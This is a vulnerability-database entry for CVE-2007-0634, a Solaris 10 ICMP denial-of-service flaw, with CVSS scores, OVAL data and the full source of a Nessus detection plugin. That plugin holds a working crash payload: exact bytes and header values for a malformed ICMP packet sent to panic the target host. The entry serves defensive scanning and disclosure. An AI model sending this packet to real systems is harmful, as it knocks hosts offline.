Vulnerabilities > CVE-2007-0634 - Remote Denial of Service vulnerability in SUN Solaris 10.0

047910
CVSS 7.8 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
COMPLETE
network
low complexity
sun
nessus
exploit available
NVD
Published: 2007-01-31
Updated: 2017-10-11

Summary

Unspecified vulnerability in Sun Solaris 10 before 20070130 allows remote attackers to cause a denial of service (system crash) via certain ICMP packets.

Vulnerable Configurations

Part Description Count
OS
Sun
1

Exploit-Db

descriptionSun Solaris 10 ICMP Unspecified Remote Denial of Service Vulnerability. CVE-2007-0634. Dos exploit for solaris platform
idEDB-ID:29540
last seen2016-02-03
modified2007-01-30
published2007-01-30
reporterkcope
sourcehttps://www.exploit-db.com/download/29540/
titleSun Solaris 10 ICMP Unspecified Remote Denial of Service Vulnerability

Nessus

NASL familyDenial of Service
NASL idSOLARIS10_ICMP_HANDLING_DOS.NASL
descriptionThe remote host appears to be running a version of Solaris 10 that contains a vulnerability in its ICMP handling process that can be leveraged by an unauthenticated remote attacker to panic the affected host.
last seen2020-06-01
modified2020-06-02
plugin id29980
published2008-01-15
reporterThis script is Copyright (C) 2008-2019 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/29980
titleSolaris 10 ICMP Packet Handling DoS
code
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(29980);
  script_version("1.17");
  script_cvs_date("Date: 2019/10/25 13:36:24");

  script_cve_id("CVE-2007-0634");
  script_bugtraq_id(22323);
  script_xref(name:"CERT", value:"967236");

  script_name(english:"Solaris 10 ICMP Packet Handling DoS");
  script_summary(english:"Sends a malicious ICMP packet");

  script_set_attribute(attribute:"synopsis", value:"The remote host is prone to a denial of service attack.");
  script_set_attribute(attribute:"description", value:
"The remote host appears to be running a version of Solaris 10 that
contains a vulnerability in its ICMP handling process that can be
leveraged by an unauthenticated remote attacker to panic the affected
host.");
  script_set_attribute(attribute:"see_also", value:"http://archives.neohapsis.com/archives/fulldisclosure/2008-01/0164.html");
  script_set_attribute(attribute:"see_also", value:"http://sunsolve.sun.com/search/document.do?assetkey=1-26-102697-1");
  script_set_attribute(attribute:"solution", value:"Apply the appropriate patch as described in the vendor advisory above.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2007/01/30");
  script_set_attribute(attribute:"plugin_publication_date", value:"2008/01/15");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_KILL_HOST);
  script_family(english:"Denial of Service");

  script_copyright(english:"This script is Copyright (C) 2008-2019 Tenable Network Security, Inc.");

  script_dependencies("os_fingerprint.nasl");
  script_require_keys("Settings/ParanoidReport");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);
if (islocalhost()) exit(0);
if (!islocalnet()) exit(0);


os = get_kb_item("Host/OS");
if (!os || "Solaris 10" >!< os) exit(0);


# Construct a malicious ICMP packet.
data = raw_string(
  0x60, 0xaa, 0x76, 0xc1, 0xec, 0xa7, 0x7d, 0xfa,
  0x8a, 0x72, 0x8e, 0xc6, 0xe3, 0xd2, 0x64, 0x13,
  0xE7, 0x4d, 0xbc, 0x01, 0x40, 0x5b, 0x8e, 0x8b,
  0xe5, 0xee, 0x5e, 0x37, 0xdd, 0xc2, 0x54, 0x8e,
  0x8d, 0xce, 0x0c, 0x42, 0x97, 0xa1, 0x8c, 0x04,
  0x8a, 0xc2, 0x6b, 0xae, 0xe9, 0x2e, 0xfe, 0xd4,
  0x4b
);
src = "224.90.115.18";

ip = forge_ip_packet(
  ip_v   : 4,
  ip_hl  : 5,
  ip_tos : 0xff,
  ip_off : 0,
  ip_len : 77,
  ip_p   : IPPROTO_ICMP,
  ip_id  : rand() % 0xffff,
  ip_ttl : 0x40,
  ip_src : src
);
boom = forge_icmp_packet(
  ip        : ip,
  icmp_type : 8,
  icmp_code : 222,
  icmp_seq  : rand() % 0xffff,
  icmp_id   : rand() % 0xffff,
  data      : data
);


# Send packet and check whether the host is down.
start_denial();
send_packet(boom, pcap_active:FALSE);
alive = end_denial();
if (!alive)
{
  set_kb_item(name:"Host/dead", value:TRUE);
  security_hole(0);
}

Oval

accepted2007-09-27T08:57:39.476-04:00
classvulnerability
contributors
namePai Peng
organizationOpsware, Inc.
definition_extensions
  • commentSolaris 10 (SPARC) is installed
    ovaloval:org.mitre.oval:def:1440
  • commentSolaris 10 (x86) is installed
    ovaloval:org.mitre.oval:def:1926
descriptionUnspecified vulnerability in Sun Solaris 10 before 20070130 allows remote attackers to cause a denial of service (system crash) via certain ICMP packets.
familyunix
idoval:org.mitre.oval:def:1249
statusaccepted
submitted2007-08-10T12:25:20.000-04:00
titleA Security Vulnerability in Solaris 10 ICMP Handling May Allow a SystemPanic and Result in Denial of Service (DoS)
version35

References